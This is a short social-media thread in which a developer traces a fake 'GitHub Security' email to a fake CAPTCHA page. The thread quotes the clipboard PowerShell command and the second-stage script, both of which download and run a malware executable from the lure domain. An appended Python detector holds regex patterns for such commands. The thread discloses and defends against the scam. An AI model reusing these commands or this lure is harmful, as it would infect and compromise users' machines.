  • Sep 18, 2024, 10:11 PM

    I just got an email from GitHub about a new issue for my password generator.

    "Hey there!

    We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.

    Best regards,
    Github Security Team"

    Uh huh. A security vulnerability for a password generator. Maybe, but I'm skeptical.

    However, the issue no longer exists. Looks like GitHub took it down as spam.

    I'm curious about that URL though.

    1/n

    💬 2🔄 4⭐ 0

Replies

  • Sep 18, 2024, 10:13 PM

    Visiting github-scanner[.]com I need to verify that I'm human. Okay, sure. It then requests I do the following:

    1. Press Windows Button + R.
    2. Press CTRL + V.
    3. Press Enter

    In other words, pull up a shell and paste whatever is in my clipboard.

    What's in the clipboard you ask?

    powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"

    "download.txt". Yeah, I'm suuuuure that's a text file.

    2/n

    💬 2🔄 0⭐ 0
  • Sep 18, 2024, 10:19 PM

    So, grabbing https://github-scanner[.]com/download.txt and pulling it up in a text editor reveals the following:

    $webClient = New-Object System.Net.WebClient
    $url1 = "https://github-scanner[.]com/l6E.exe"
    $filePath1 = "$env:TEMP\SysSetup.exe"
    $webClient.DownloadFile($url1, $filePath1)
    Start-Process -FilePath $env:TEMP\SysSetup.exe

    "l6E.exe". Any bets on whether or not that's malware?

    Sure enough, it's a positive match with VirusTotal.

    virustotal.com/gui/file/d73763

    3/3

    💬 2🔄 0⭐ 0
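
Detection logic for the pasted command quoted in the thread, added here as an example and not part of the original posts: it checks process command lines (for example from process-creation logs) for the combination the thread shows, a hidden PowerShell window, a web download, dynamic execution, and a trailing decoy "verification" comment. The function names, the scoring rule and the sample log lines are assumptions constructed for illustration, and the sample host is a placeholder.

```python
import re

# (label, pattern) heuristics drawn from the command shown in the thread.
INDICATORS = [
    ("hidden_window", re.compile(r"-w[a-z]*\s+hidden\b", re.I)),
    ("web_download", re.compile(
        r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|"
        r"downloadstring|downloadfile)\b", re.I)),
    ("dynamic_exec", re.compile(
        r"\b(?:iex|invoke-expression|start-process)\b", re.I)),
    # Text after '#' is a PowerShell comment; the lure uses it so the Run
    # dialog shows a harmless-looking "verification" string to the user.
    ("decoy_comment", re.compile(r"#.*(?:not a robot|captcha|verif)", re.I)),
]

def matched(cmdline):
    """Return the labels of all indicators present in one command line."""
    return [label for label, rx in INDICATORS if rx.search(cmdline)]

def is_suspicious(cmdline):
    """Flag PowerShell that downloads AND executes while hiding or disguising itself."""
    lowered = cmdline.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return False
    hits = set(matched(cmdline))
    download_and_run = {"web_download", "dynamic_exec"} <= hits
    concealed = bool(hits & {"hidden_window", "decoy_comment"})
    return download_and_run and concealed

def scan(cmdlines):
    """Return only the command lines that should be escalated for review."""
    return [c for c in cmdlines if is_suspicious(c)]

# Constructed sample command lines (placeholder host, not real telemetry).
SAMPLE = [
    "powershell.exe -w hidden -Command \"iex (iwr "
    "'https://lure.example.invalid/download.txt').Content\" "
    "# \"I am not a robot - reCAPTCHA Verification ID: 00000\"",
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    "powershell.exe -Command \"Invoke-WebRequest "
    "https://intranet.example.invalid/health -UseBasicParsing\"",
    "cmd.exe /c echo iex iwr -w hidden",
]

if __name__ == "__main__":
    for line in scan(SAMPLE):
        print(matched(line), line)
```

Requiring download plus execution plus concealment keeps routine administrative PowerShell, such as the health-check line in the sample, out of the results.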